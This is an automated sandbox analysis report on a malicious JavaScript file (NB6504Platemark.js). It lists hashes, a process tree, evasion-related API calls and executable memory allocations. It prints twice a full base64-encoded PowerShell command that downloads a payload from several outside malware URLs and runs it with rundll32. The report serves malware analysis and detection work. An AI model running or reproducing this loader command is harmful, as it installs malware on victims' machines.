Summary | ZeroBOX

NB6504Platemark.js

Generic Malware Antivirus AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6401 April 5, 2023, 10:21 a.m. April 5, 2023, 10:23 a.m.
Size 164.4KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 94c66f83a8578ecf960ee2654380c490
SHA256 764c2fdccb97445ed2f2ff37285f4f4e554a832cdee493bb3c3ced2a7f784158
CRC32 55A58669
ssdeep 3072:YAoiKWK+8N+9YlXTbOl6u+aiWAKXSvjxwzboNOT6iGvnnt07BmYYdQZvYP:YA5CN+9YlXTqQuViWiHNw6BvtsmYZvq
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\NB6504Platemark.js

    2548
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAZABlAHUAdABvAG4AeQBtAHAAaABhAGwARQByAHIAYQBuAGQAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGwAbwBnAGQAbwBjAGkAcwBuAGUAaQByAG8AcwAuAGMAbwBtAC4AYgByAC8ARwBPAG0ALwBJAGkANgBYADAATQB6AEcAcwA4AHoALABoAHQAdABwAHMAOgAvAC8AaQBtAG0AdQBuAG8AbABpAGQAZQByAGEAegBnAG8AeQBvAHAAbwByAHQAdQBuAGkAZABhAGQALgBjAG8AbQAvAHgAcQBhADYAQwBuAHkALwAxAFAAZgB5AGgAdQBuAEYALABoAHQAdABwAHMAOgAvAC8AYwBvAG0AdQBuAGkAZABhAGQAZQBoAGUAYgByAG8AbQAuAGMAbwBtAC4AYgByAC8AMABQADEANgAvAHQAcQB1ADcAdQBzAEcANwBCACwAaAB0AHQAcAA6AC8ALwB1AG4AaQB0AGUAZABlAGMALQBlAGcALgBjAG8AbQAvAEkARgBVADYAbABsAFoALwBTAG4AbgBnADUASABuAFQAQQBmADEALABoAHQAdABwAHMAOgAvAC8AdABoAGUAeQBvAHUAbgBnAGEAbgBkAHQAaABlAHIAYQB0AGMAaABlAHQALgBjAG8AbQAvAEkAegB2AE8ALwBPAHMAawBNADAALABoAHQAdABwAHMAOgAvAC8AYgBlAGIAZQBzAHMAaQAuAGMAbwBtAC4AdAByAC8AUQA5AFEAYgBTAGkALwBoAHMARQBWADIALABoAHQAdABwAHMAOgAvAC8AdABoAGUAdwBhAHQAYwBoAHoAbwBuAGUAYgBkAC4AYwBvAG0ALwB0AGsAaAA0AFAASAAvAGUARwB3AGYATwB6AEgALABoAHQAdABwAHMAOgAvAC8AYwBvAHoAYQByAHEAaQBuAGcAZQBuAGkAZQByAGkAYQAuAGMAbwBtAC4AbQB4AC8AUgA1AEEAdwBrAGgANAAvAHEANwAwAGoAWAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABkAGUAcABvAHIAdAAgAGkAbgAgACQAZABlAHUAdABvAG4AeQBtAHAAaABhAGwARQByAHIAYQBuAGQAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAGQAZQBwAG8AcgB0ACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMgAwACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABwAGEAbABtAGkAcwB0AHMALgBwAGEAZABkAGwAZQBiAG8AYQByAGQAVQBuAGwAaQB2AGUAbAB5ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAGwAbQBpAHMAdABzAC4AcABhAGQAZABsAGUAYgBvAGEAcgBkAFUAbgBsAGkAdgBlAGwAeQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABwAGEAbABtAGkAcwB0AHMALgBwAGEAZABkAGwAZQBiAG8AYQByAGQAVQBuAGwAaQB2AGUAbAB5ACwAWAA1ADUANQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"

      2684

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
185.252.178.121 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e6ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e6ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e6ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e6ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e68a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e75e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e7528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 1310720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2684
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726a1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0262a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2684
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02622000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02632000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02633000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02634000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0262b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02635000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02870000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02636000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02663000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02664000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02665000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02666000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02667000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02668000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02669000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02acb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02acc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02acd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ace000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02acf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c61000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c63000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c64000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAZABlAHUAdABvAG4AeQBtAHAAaABhAGwARQByAHIAYQBuAGQAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGwAbwBnAGQAbwBjAGkAcwBuAGUAaQByAG8AcwAuAGMAbwBtAC4AYgByAC8ARwBPAG0ALwBJAGkANgBYADAATQB6AEcAcwA4AHoALABoAHQAdABwAHMAOgAvAC8AaQBtAG0AdQBuAG8AbABpAGQAZQByAGEAegBnAG8AeQBvAHAAbwByAHQAdQBuAGkAZABhAGQALgBjAG8AbQAvAHgAcQBhADYAQwBuAHkALwAxAFAAZgB5AGgAdQBuAEYALABoAHQAdABwAHMAOgAvAC8AYwBvAG0AdQBuAGkAZABhAGQAZQBoAGUAYgByAG8AbQAuAGMAbwBtAC4AYgByAC8AMABQADEANgAvAHQAcQB1ADcAdQBzAEcANwBCACwAaAB0AHQAcAA6AC8ALwB1AG4AaQB0AGUAZABlAGMALQBlAGcALgBjAG8AbQAvAEkARgBVADYAbABsAFoALwBTAG4AbgBnADUASABuAFQAQQBmADEALABoAHQAdABwAHMAOgAvAC8AdABoAGUAeQBvAHUAbgBnAGEAbgBkAHQAaABlAHIAYQB0AGMAaABlAHQALgBjAG8AbQAvAEkAegB2AE8ALwBPAHMAawBNADAALABoAHQAdABwAHMAOgAvAC8AYgBlAGIAZQBzAHMAaQAuAGMAbwBtAC4AdAByAC8AUQA5AFEAYgBTAGkALwBoAHMARQBWADIALABoAHQAdABwAHMAOgAvAC8AdABoAGUAdwBhAHQAYwBoAHoAbwBuAGUAYgBkAC4AYwBvAG0ALwB0AGsAaAA0AFAASAAvAGUARwB3AGYATwB6AEgALABoAHQAdABwAHMAOgAvAC8AYwBvAHoAYQByAHEAaQBuAGcAZQBuAGkAZQByAGkAYQAuAGMAbwBtAC4AbQB4AC8AUgA1AEEAdwBrAGgANAAvAHEANwAwAGoAWAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABkAGUAcABvAHIAdAAgAGkAbgAgACQAZABlAHUAdABvAG4AeQBtAHAAaABhAGwARQByAHIAYQBuAGQAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAGQAZQBwAG8AcgB0ACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMgAwACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABwAGEAbABtAGkAcwB0AHMALgBwAGEAZABkAGwAZQBiAG8AYQByAGQAVQBuAGwAaQB2AGUAbAB5ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAGwAbQBpAHMAdABzAC4AcABhAGQAZABsAGUAYgBvAGEAcgBkAFUAbgBsAGkAdgBlAGwAeQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABwAGEAbABtAGkAcwB0AHMALgBwAGEAZABkAGwAZQBiAG8AYQByAGQAVQBuAGwAaQB2AGUAbAB5ACwAWAA1ADUANQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
